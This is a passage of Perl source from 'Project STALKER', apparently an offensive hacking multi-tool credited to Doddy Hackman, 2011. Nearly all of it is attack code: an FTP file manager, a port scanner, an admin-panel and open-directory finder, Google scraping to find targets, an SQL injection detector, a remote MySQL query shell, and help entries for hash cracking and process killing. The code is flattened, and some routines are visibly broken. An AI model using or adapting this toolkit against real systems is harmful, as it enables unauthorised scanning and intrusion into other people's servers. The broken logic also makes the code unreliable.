rmdir : delete a directory <dir> pwd : directory del : delete a file <file> rename : change name of the a file <file1> <file2> size : size of the a file <file> put : upload a file <file> get : download a file <file> cdup : change dir <dir> exit : ?? 
); } if ($cmd=~/dir/ig) { if (my @files = $socket->dir()) { for(@files) { print "[+] ".$_."\n"; } } else { print "\n\n[-] Error\n\n"; } } if ($cmd=~/pwd/ig) { print "[+] Path : ".$socket->pwd()."\n"; } if ($cmd=~/cd (.*)/ig) { if ($socket->cwd($1)) { print "[+] Directory changed\n"; } else { print "\n\n[-] Error\n\n"; } } if ($cmd=~/cdup/ig) { if (my $dir = $socket->cdup()) { print "\n\n[+] Directory changed\n\n"; } else { print "\n\n[-] Error\n\n"; } } if ($cmd=~/del (.*)/ig) { if ($socket->delete($1)) { print "[+] File deleted\n"; } else { print "\n\n[-] Error\n\n"; } } if ($cmd=~/rename (.*) (.*)/ig) { if ($socket->rename($1,$2)) { print "[+] File Updated\n"; } else { print "\n\n[-] Error\n\n"; } } if ($cmd=~/mkdir (.*)/ig) { if ($socket->mkdir($1)) { print "\n\n[+] Directory created\n"; } else { print "\n\n[-] Error\n\n"; } } if ($cmd=~/rmdir (.*)/ig) { if ($socket->rmdir($1)) { print "\n\n[+] Directory deleted\n"; } else { print "\n\n[-] Error\n\n"; } } if ($cmd=~/exit/ig) { next; } if ($cmd=~/get (.*) (.*)/ig) { print "\n\n[+] Downloading file\n\n"; if ($socket->get($1,$2)) { print "[+] Download completed"; } else { print "\n\n[-] Error\n\n"; } } if ($cmd=~/put (.*) (.*)/ig) { print "\n\n[+] Uploading file\n\n"; if ($socket->put($1,$2)) { print "[+] Upload completed"; } else { print "\n\n[-] Error\n\n"; } } if ($cmd=~/quit/) { next; } goto menu; } else { print "\n[-] Failed the login\n\n"; } } else { print "\n\n[-] Error\n\n"; } } sub scanpaths { my $urla = $_[0]; print "\n[+] Find paths in $urla\n\n\n"; my @urls = repes(get_links(toma($urla))); for $url(@urls) { my $web = $url; my ($scheme, $auth, $path, $query, $frag) = uri_split($url); if ($_[0] =~/$auth/ or $auth eq "") { if ($path=~/(.*)\/(.*)\.(.*)$/) { my $borrar = $2.".".$3; if ($web=~/(.*)$borrar/) { my $co = $1; unless ($co=~/$auth/) { $co = $urla.$co; } $code = toma($co); if ($code=~/Index Of/ig) { print "[Link] : ".$co."\n"; saveyes("logs/paths-found.txt",$co); }}}}}} sub scanport { my %ports = 
("21"=>"ftp", "22"=>"ssh", "25"=>"smtp", "80"=>"http", "110"=>"pop3", "3306"=>"mysql" ); print "[+] Scanning $_[0]\n\n\n"; for my $port(keys %ports) { if (new IO::Socket::INET(PeerAddr => $_[0],PeerPort => $port,Proto => "tcp",Timeout => 0.5)) { print "[Port] : ".$port." [Service] : ".$ports{$port}."\n"; } } print "\n\n[+] Finish\n"; } sub scanpanel { print "[+] Scanning $_[0]\n\n\n"; for $path(@panels) { $code = tomax($_[0]."/".$path); if ($code->is_success) { print "[Link] : ".$_[0]."/".$path."\n"; saveyes("logs/panel-logs.txt",$_[0]."/".$path); } } print "\n\n[+] Finish\n"; } sub google { my($a,$b) = @_; for ($pages=10;$pages<=$b;$pages=$pages+10) { $code = toma("http://www.google.com.ar/search?hl=&q=".$a."&start=$pages"); my @links = get_links($code); for my $l(@links) { if ($l =~/webcache.googleusercontent.com/) { push(@url,$l); } } } for(@url) { if ($_ =~/cache:(.*?):(.*?)\+/) { push(@founds,$2); } } my @founds = repes(@founds); return @founds; } sub sql { my ($pass1,$pass2) = ("+","--"); my $page = shift; if ($code1=~/The used SELECT statements have a different number of columns/ig) { print "[+] SQLI : $page\a\n"; saveyes("logs/sql-logs.txt",$page); }} sub get_links { $test = HTML::LinkExtor->new(\&agarrar)->parse($_[0]); return @links; sub agarrar { my ($a,%b) = @_; push(@links,values %b); } } sub repes { foreach $test(@_) { push @limpio,$test unless $repe{$test}++; } return @limpio; } sub head { cprint "\x0311"; #13 print "\n\n-- == Project STALKER == --\n\n"; cprint "\x030"; } sub copyright { cprint "\x0311"; #13 print"\n\n(C) Doddy Hackman 2011\n\n"; cprint "\x030"; } sub toma { return $nave->get($_[0])->content; } sub tomax { return $nave->get($_[0]); } sub tomar { my ($web,$var) = @_; return $nave->post($web,[%{$var}])->content; } sub conectar { my $sockex = new IO::Socket::INET(PeerAddr => $_[0],PeerPort => $_[1], Proto => "tcp",Timeout => 5); print $sockex $_[2]."\r\n"; $sockex->read($re,5000); $sockex->close; return $re."\r\n"; } sub enter { my 
($host,$user,$pass) = @_; print "[+] Connecting to the server\n"; $info = "dbi:mysql::".$host.":3306"; if (my $enter = DBI->connect($info,$user,$pass,{PrintError=>0})) { print "\n[+] Enter in the database"; while(1) { print "\n\n\n[+] Query : "; chomp(my $ac = <stdin>); $enter->disconnect; print "\n\n[+] Closing connection\n\n"; last; } $re = $enter->prepare($ac); $re->execute(); my $total = $re->rows(); my @columnas = @{$re->{NAME}}; if ($total eq "-1") { print "\n\n[-] Query Error\n"; next; } else { print "\n\n[+] Result of the query\n"; if ($total eq 0) { print "\n\n[+] Not rows returned\n\n"; } else { print "\n\n[+] Rows returned : ".$total."\n\n\n"; for(@columnas) { print $_."\t\t"; } print "\n\n"; while (@row = $re->fetchrow_array) { for(@row) { print $_."\t\t"; } print "\n"; }}}} } else { print "\n[-] Error connecting\n"; }} sub encode { my $string = $_[0]; $hex = '0x'; for (split //,$string) { $hex .= sprintf "%x", ord; } return $hex; } sub saveyes { open (SAVE,">>".$_[0]); print SAVE $_[1]."\n"; close SAVE; } sub savefile { open (SAVE,">>logs/webs/".$_[0]); print SAVE $_[1]."\n"; close SAVE; } sub coleccionar { opendir DIR,$_[0]; my @archivos = readdir DIR; close DIR; return @archivos; } sub helpme { cprint "\x0310"; #13 print qq( Commands : getip <host> getlink <page> getprocess killprocess <name process> <pid process> conec <host> <port> <command> allow <host> paths <page> encodehex <text> decodehex <text> encodeascii <text> decodeascii <text> encodebase <text> decodebase <text> scanport <host> panel <page> getpass <hash> kobra <page> ftp <host> <user> <pass> mysql <host> <user> <pass> navegator scangoogle help exit ); cprint "\x030"; } # # The End ? #